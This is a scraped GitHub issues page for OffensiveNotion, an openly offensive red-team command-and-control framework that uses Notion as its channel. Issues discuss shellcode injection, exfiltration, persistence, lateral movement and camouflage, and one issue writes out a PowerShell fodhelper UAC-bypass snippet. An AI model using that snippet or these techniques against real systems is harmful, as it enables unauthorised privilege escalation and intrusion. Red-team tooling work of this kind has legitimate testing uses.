mttaggart / offensivenotion Goto Github PK
View Code? Open in Web Editor NEWNotion as a platform for offensive operations
License: MIT License
Notion as a platform for offensive operations
License: MIT License
Describe the bug
inject self
will kill the Notion agent if the injection happens but no session spawns. If you inject meterpreter shellcode but no multi/handler is up to catch it, for example.
To Reproduce
Host shellcode
Do not run a multi/handler
Perform self injection
Expected behavior
The agent should handle this and exit from the CreateThread injection routine alive.
The basic idea would be to provide auth tokens dynamically to a command that knew how to send data to S3/Azure/DO storage buckets.
Command proposal
upload s3 $token path/to/file
If at any point you interrupt the install script, the Dockerfile (which has been SED'd to build the agent in the correct os/build version) gets stuck as the one you set during that build. Easily fixable but annoying.
Currently looking for help on this one, need a good example of Rust implementation of loading the CLR and FFI for .NET in general
There are slight differences between main.py's config setup and the one that occurs if you run the agent with -d
. These should be 1-1
Might be a bug when Linux (and maybe macOS) agent attempts to selfdestruct but does not have write access to the directory to be able to manipulate the file. Weird edge case and I can't seem to reproduce it but it did happen that one time
Describe the bug
LAUNCH_APP
is one of the config options that should make the application launch the fake Notion page on Windows/Linux. However, the option is never asked for nor sed
ed in the Python build script.
To Reproduce
Steps to reproduce the behavior:
LAUNCH_APP
option is never requested.config.json
from the first run to include "LAUNCH_APP": true
as a key/value pair.Similar to sleep
and jitter
:
#Registry Command Edit
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value [injection] -Force
#Bypass Execution
Start-Process "C:\Windows\System32\fodhelper.exe"
^^
Using VirtualAlloc/VirtualProtect/CreateThread/WaitForSingleObject pattern
Release binaries, cargo build, xfer to Taggart's profile, check links in wiki, social media posts and launch party
Delete bin on disk
Shutdown agent
(bonus) Overwrite proc memory
Though it may be a while before SCShell is online, we did accidentally discover the API call patterns required to do token creation and impersonation a la Cobalt Strike.
Ref:
https://github.com/HuskyHacks/RustySCShell/blob/master/src/main.rs#L80
config
and guardrailsPackaged YARA Rules
Allow elevation on Windows from High integrity sessions to NT Authority\SYSTEM
.
Looking at [this] from SharpDPAPI as inspiration: https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/lib/Helpers.cs#L400
selfdestruct
inject self
docker build
and docker run
that kicks off main.py within the container)This ships getting ready to leave the harbor.
Criteria:
Yara rule + interceptor script to POC a defender takedown of the ON agent.
Working branch is https://github.com/mttaggart/OffensiveNotion/tree/defenderkit and can be developed independent of rest of project
is it?
Runas to run in another user's context
Carve out the Notion layer of OffensiveNotion into its own module, allowing the C2 to work on other LOTS channels.
Integrate a way to load COFF files on the agent to provide a lot more flexibility and functionality to the framework.
Seen someone tried to write BOFs for CS https://github.com/wumb0/rust_bof in Rust.
Other potentially helpful projects:
https://github.com/trustedsec/COFFLoader
https://github.com/Yaxser/COFFLoader2
https://github.com/frkngksl/NiCOFF
https://github.com/d4rckh/nim-coff
red team responsibly, kiddos
Develop lat move capabilities for all OS builds.
Win:
Lin/macOS:
Shellcode injection for this is probably off the table (shellcode for the ON agent would be unwieldly and frankly ridiculous)
Likely will use some kind of remote copy primitive to send it to other hosts
(bonus )Any design space for P2P?
command.rs
is getting a lil shaggy. Time to break it up into submodules to make adding commands a cleaner experience.
just like the title says
Come up with a way (ways?!) to persist the agent.
For moving data out of the target environment
Crude proto function implemented in b89c5c3
** LONG TERM PROJECT **
Our good friend, president of the Enthusiastic Mollusk Afficianado club himself, @Alh4zr3d, recommended we look into how to mitigate the possibility of SSL proxy/stripping in an environment. This risk is mentioned in passing in the OPSEC section of the Wiki, but not addressed directly.
Some thoughts:
Lots of design space for interesting solutions, and definitely is a lot of work, but I also think it's doable.
Whoami, getprivs, isAdmin
Section for recognizing contributors!
License for the repo, I lean towards MIT
A how-to guide for adding things like new commands to the project
For camouflage (and persistence), actually launch the notion site in a browser that's available.
This is a big lift, but once done, the Windows components will be much more ergonomic.
elevate.rs
getprivs.rs
inject.rs
selfdestruct.rs
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.